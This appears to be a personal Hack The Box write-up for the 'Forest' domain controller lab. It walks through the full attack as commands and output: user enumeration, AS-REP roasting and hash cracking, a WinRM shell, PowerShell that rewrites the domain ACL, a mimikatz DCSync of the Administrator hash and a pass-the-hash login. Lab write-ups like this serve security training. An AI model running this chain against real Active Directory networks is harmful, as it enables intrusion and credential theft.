Hack the Box Walkthrough: Forest

  about 2322 words  11 min 

Overview

This post provides a walkthrough of the Forest system on Hack The Box. This walktrough, in entirety, is a spoiler.

I create these walkthroughs as documentation for myself while working through a system; excuse any brevity or lack of formality. I’ve uploaded this walkthrough to help those that may be stuck.

Service Enumeration

To kick things off, we start with some service discovery to figure out what is actually running on this box.

Nmap Scan

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
# nmap -A -Pn -n -T5 -p1-65535 10.10.10.161
[snip]
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-25 21:08:32Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49684/tcp open  msrpc        Microsoft Windows RPC
49703/tcp open  msrpc        Microsoft Windows RPC
49906/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/25%Time=5DB362BB%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 (93%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h26m50s, deviation: 4h02m30s, median: 6m49s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2019-10-25T14:09:55-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2019-10-25T21:09:54
|_  start_date: 2019-10-24T22:14:17
[snip]

The SMB service looks interesting, so I decided to perform some light enumeration.

SMB User Enum

1
2
3
4
msf5 auxiliary(scanner/smb/smb_enumusers) > run

[+] 10.10.10.161:445      - HTB [ Administrator, Guest, krbtgt, DefaultAccount, $331000-VK4ADACQNUCA, SM_2c8eef0a09b545acb, SM_ca8c2ed5bdab4dc9b, SM_75a538d3025e4db9a, SM_681f53d4942840e18, SM_1b41c9286325456bb, SM_9b69f1b9d2cc45549, SM_7c96b981967141ebb, SM_c75ee099d0a64c91b, SM_1ffab36a2f5f479cb, HealthMailboxc3d7722, HealthMailboxfc9daad, HealthMailboxc0a90c9, HealthMailbox670628e, HealthMailbox968e74d, HealthMailbox6ded678, HealthMailbox83d6781, HealthMailboxfd87238, HealthMailboxb01ac64, HealthMailbox7108a4e, HealthMailbox0659cc1, sebastien, lucinda, svc-alfresco, andy, mark, santi ] ( LockoutTries=0 PasswordMin=7 )

Named Pipe ENum

1
2
3
4
5
6
msf5 auxiliary(scanner/smb/pipe_auditor) > run

[+] 10.10.10.161:445      - Pipes: \netlogon, \lsarpc, \samr
[*] 10.10.10.161:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Domain User Enum

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
# rpcclient -U "" -N 10.10.10.161
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

Group Membership

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
rpcclient $> queryusergroups 0x478
	group rid:[0x201] attr:[0x7]
rpcclient $> queryusergroups 0x479
	group rid:[0x201] attr:[0x7]
rpcclient $> queryusergroups 0x47a
	group rid:[0x201] attr:[0x7]
rpcclient $> queryusergroups 0x47e
	group rid:[0x201] attr:[0x7]
rpcclient $> querygroup 0x201
	Group Name:	Domain Users
	Description:	All domain users
	Group Attribute:7
	Num Members:30
rpcclient $> queryusergroups 0x479
	group rid:[0x201] attr:[0x7]
rpcclient $> queryusergroups 0x47a
	group rid:[0x201] attr:[0x7]
rpcclient $> queryusergroups 0x47b
	group rid:[0x201] attr:[0x7]
	group rid:[0x47c] attr:[0x7]
rpcclient $> queryusergroups 0x47e
	group rid:[0x201] attr:[0x7]
rpcclient $> queryusergroups 0x47f
	group rid:[0x201] attr:[0x7]
rpcclient $> queryusergroups 0x480
	group rid:[0x201] attr:[0x7]
rpcclient $> querygroup 0x201
	Group Name:	Domain Users
	Description:	All domain users
	Group Attribute:7
	Num Members:30
rpcclient $> querygroup 0x47c
	Group Name:	Service Accounts
	Description:	
	Group Attribute:7
	Num Members:1

Getting User Flag

I noticed the one of the users was called svc-alfresco and it was confirmed, in the above snippet, to be a service account. This got me thinking that this challenge was likely focused around kerberos related attacks.

Using impacket's GetNPUserd.spy, we are able to identify any accounts that are present with UF_DONT_REQUIRE_PREAUTH bit set. If this bit is set, we can retrieve a TGT for that user object without having to execute kerberos pre-authentication.

ASREP Roast

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
# ./GetNPUsers.py -usersfile /root/users -dc-ip 10.10.10.161  -no-pass -request -outputfile out htb.local/
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
root@htbvm:~/Impacket/examples# cat out 
$krb5asrep$23$svc-alfresco@HTB.LOCAL:2daf4fae907f54b4e3630829f24db9a9$d1e086a6ff6d035b2c2c74acac12b02e12d3e8637b1c34361734e949d2a51c77f81affcffc4a275d8f5395ac6ea1861a8636f6f5e67dfbdac116e551063465db88bd824b439d195f3780cdea6713fc8b4183407dd28ea74e27ff316d2ef4dee40a9d8fc85f2d27345ea1bf692b76e75b930de410f4b72cbace7b4d4c51b5e059b31692082f703fdfdcae8cc60aad8c060348a3c6d7ddb55fd39fd5a19d8ec18321d80014fc2fa98bf16b88b7ca6fc41658e723f2c9b5bbf5a0e4387c667cbac7fd0aaf6653ff24427c24fd2e6b3966d2dc220ea0c6108190d200fd39ce4eb0d184ae1bb5dc69
root@htbvm:~/Impacket/examples# 

As seen above, we were able to recover the TGT and put the hash in a format that hashcat can understand.

Cracking TGT Hash

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# hashcat -O -m 18200 -a 0 --self-test-disable -o cracked_asrep asrep Downloads/rockyou.txt
hashcat (v5.1.0) starting...

Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:df2b0d4842f6d8...4a8080
Time.Started.....: Fri Oct 25 23:15:21 2019 (2 secs)
Time.Estimated...: Fri Oct 25 23:15:23 2019 (0 secs)
Guess.Base.......: File (Downloads/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........:   214.7 kH/s (9.63ms) @ Accel:4 Loops:1 Thr:64 Vec:1
Speed.#3.........:  2925.3 kH/s (7.22ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Speed.#*.........:  3140.0 kH/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4215737/14344384 (29.39%)
Rejected.........: 953/4215737 (0.02%)
Restore.Point....: 3935130/14344384 (27.43%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#2....: robinhood1997 -> rob allen
Candidates.#3....: scoobyddo2 -> robinhood2009

Started: Fri Oct 25 23:15:20 2019
Stopped: Fri Oct 25 23:15:24 2019

 milos  ~  cat cracked_asrep
$krb5asrep$23$svc-alfresco@HTB.LOCAL:df2b0d4842f6d88e468e5e6f96911621$6e91de1fe97b51f438c05f253696945c3c43447cbb409a61489c7f54b59790503df55eed966ac2588c5a0e269fb464f0efe5dbdf9d23f147b65e346b3386e9d0e078775d925cee56d19699ca4943ff81eb6e0bfde3312997d67c8149908c21becb269e150fd2742bcbd588ce93b926fb774a2e5b0259323bcfb95cacc0668558dd766c37af25c4caef748cde31d06c4b02a8d9af775e272f5894eebc7832eaf1152a26badb8839ca79f2e4ca41aed9103b5b703f6452dcd0f65ebb4885e44241419192e655deb2861062dc8b50a4afe613bcd520259856e1b93fb61cd347666e27e24d4a8080:s3rvice
$krb5asrep$23$svc-alfresco@HTB.LOCAL:df2b0d4842f6d88e468e5e6f96911621$6e91de1fe97b51f438c05f253696945c3c43447cbb409a61489c7f54b59790503df55eed966ac2588c5a0e269fb464f0efe5dbdf9d23f147b65e346b3386e9d0e078775d925cee56d19699ca4943ff81eb6e0bfde3312997d67c8149908c21becb269e150fd2742bcbd588ce93b926fb774a2e5b0259323bcfb95cacc0668558dd766c37af25c4caef748cde31d06c4b02a8d9af775e272f5894eebc7832eaf1152a26badb8839ca79f2e4ca41aed9103b5b703f6452dcd0f65ebb4885e44241419192e655deb2861062dc8b50a4afe613bcd520259856e1b93fb61cd347666e27e24d4a8080:s3rvice
 milos  ~ 

Earlier during port scanning I identified the presence of WinRM (5985/tcp) so I leveraged evil-winrm (https://github.com/Hackplayers/evil-winrm) to get a shell on the box:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
# ruby evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p 's3rvice' 
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
cd *Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
ls
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ls
    Directory: C:\Users\svc-alfresco\Desktop
Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-ar---        9/23/2019   2:16 PM             32 user.txt                                                                                                                                                                                                
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> cat user.txt
e5e4e47ae7022664cda6eb013fb0d9ed
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> 

This allowed me to successfully gain access to the user flag.

Getting Root Flag

After spending some time looking through the system, I didn’t really say anythign too interesting; no interesting software or service installed, no interesting processes. I had a hunch that given this is a DC, the idea was to target active directory misconfigurations for privilege escalation.

In order to get better insight, I used SharpHound to enumerate AD and give me a better visiblity on privilege escalation paths.

SharpHound Enumeration

This was done via a windows VM. I tried using PowerShell for Linux but this seemed to fail citing misssing DLLs, so I didn’t spend much time going further down that route.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
PS C:\USers\IEUser\Downloads> .\SharpHound.exe --CollectionMethod All  --Domain "htb.local" --DomainController "forest.h
tb.local" --LDAPUser "svc-alfresco" --LDAPPass "s3rvice"
Initializing BloodHound at 7:38 PM on 10/27/2019
Manually specifying a domain controller will likely result in data loss. Only use this for performance/opsec reasons
Resolved Collection Methods to Group, LocalAdmin, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets
Starting Enumeration for htb.local
Status: 123 objects enumerated (+123 6.833333/s --- Using 55 MB RAM )
Finished enumeration for htb.local in 00:00:18.0926725
1 hosts failed ping. 0 hosts timedout.

Compressing data to .\20191027193846_BloodHound.zip.
You can upload this file directly to the UI.
Finished compressing files!

BloodHound Output

The above collected data is visualized below using the “Shortest Path to Domain ADmin” query. The user account on the far right is the hub\svc-alfresco account that we had previously compromised.

As we can see from the output above, we have GenericAll permissions on the Exchange Windows Permisisons group, which in turn has WriteDacl permissions on the domain object. If we add the svc-aflresco user to the Exchange Windows Permissions group, we gain the ability to modify the domain object ACL.

Since we are already in our Windows attack VM, we might as well continue from the same box. Earlier we discovered that svc-alfresco was able to leverage WinRM to gain a shell on the box. We again connect through WinRM for a shell, but this time using buil-in PowerShell cmdlets.

First we get the credential for our user (svc-alfresco/s3rvice) and then we instantiate and enter the Remote PowerShell Session.

Privilege Escalation via ACL / ACE Abuse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
PS C:\Windows\system32> $cred = Get-Credential

cmdlet Get-Credential at command pipeline position 1
Supply values for the following parameters:
Credential
PS C:\Windows\system32> New-PSSession -ComputerName "10.10.10.161" -Authentication Negotiate -Credential $cred

 Id Name            ComputerName    ComputerType    State         ConfigurationName     Availability
 -- ----            ------------    ------------    -----         -----------------     ------------
 21 WinRM21         10.10.10.161    RemoteMachine   Opened        Microsoft.PowerShell     Available


PS C:\Windows\system32> Enter-PSSession 21
[10.10.10.161]: PS C:\Users\svc-alfresco\Documents> hostname
FOREST
[10.10.10.161]: PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
[10.10.10.161]: PS C:\Users\svc-alfresco\Documents>

From here, we can go ahead and manipulate the domain object to give ourselves GenericAll privileges.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
[10.10.10.161]: PS C:\> Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members svc-alfresco
[10.10.10.161]: PS C:\> $acl = get-acl "ad:DC=htb,DC=local"
[10.10.10.161]: PS C:\> $id = [Security.Principal.WindowsIdentity]::GetCurrent()
[10.10.10.161]: PS C:\> $user = Get-ADUser -Identity $id.User
[10.10.10.161]: PS C:\> $sid = new-object System.Security.Principal.SecurityIdentifier $user.SID
[10.10.10.161]: PS C:\> $identity = [System.Security.Principal.IdentityReference] $sid
[10.10.10.161]: PS C:\> $adRights = [System.DirectoryServices.ActiveDirectoryRights] "GenericAll"
[10.10.10.161]: PS C:\> $type = [System.Security.AccessControl.AccessControlType] "Allow"
[10.10.10.161]: PS C:\> $inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
[10.10.10.161]: PS C:\> $ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$inheritanceType
[10.10.10.161]: PS C:\> $acl.AddAccessRule($ace)
[10.10.10.161]: PS C:\> Set-acl -aclobject $acl "ad:DC=htb,DC=local"
[10.10.10.161]: PS C:\> Get-ADGroupMember -Identity "Exchange Windows Permissions"
distinguishedName : CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
name              : svc-alfresco
objectClass       : user
objectGUID        : 58a51302-4c7c-4686-9502-d3ada3afaef1
SamAccountName    : svc-alfresco
SID               : S-1-5-21-3072663084-364016917-1341370565-1147

distinguishedName : CN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
name              : Exchange Trusted Subsystem
objectClass       : group
objectGUID        : ba27b45c-669a-4690-bdfc-ee0345e17521
SamAccountName    : Exchange Trusted Subsystem
SID               : S-1-5-21-3072663084-364016917-1341370565-1119

Interestingly enough, the group changes would persist for only roughly a minute. I think there was likely some code on the DC to revert changes to make this box a bit harder. The above was pasted in to the PowerShell session in order to speed things up.

DCSync for ADministrator Hash

After modifying the permissions on the domain object we can simply leverage mimikatz lsadump::dcsync funcitonality to retrieve the hash.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
PS C:\USers\IEUser\Downloads\mimikatz_trunk\x64> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Aug 14 2019 01:31:47
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # lsadump::dcsync /domain:htb.local /user:ADministrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'ADministrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
User Principal Name  : Administrator@htb.local
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration   :
Password last change : 9/18/2019 1:09:08 PM
Object Security ID   : S-1-5-21-3072663084-364016917-1341370565-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 32693b11e6aa90eb43d32c72a07ceea6

I attempted to use a number of online password cracking oslutions to crack the hash but was unsuccessful. Instead, I opted to use the -hash option within evil-winrm to pass-the-hash and establish a shell as Administrator. I then retrieved the root flag.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
root@htbvm:~/evil-winrm# ./evil-winrm.rb -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6

Evil-WinRM shell v1.8

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
f048153f202bbb2f82622b04d79129cc
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 

References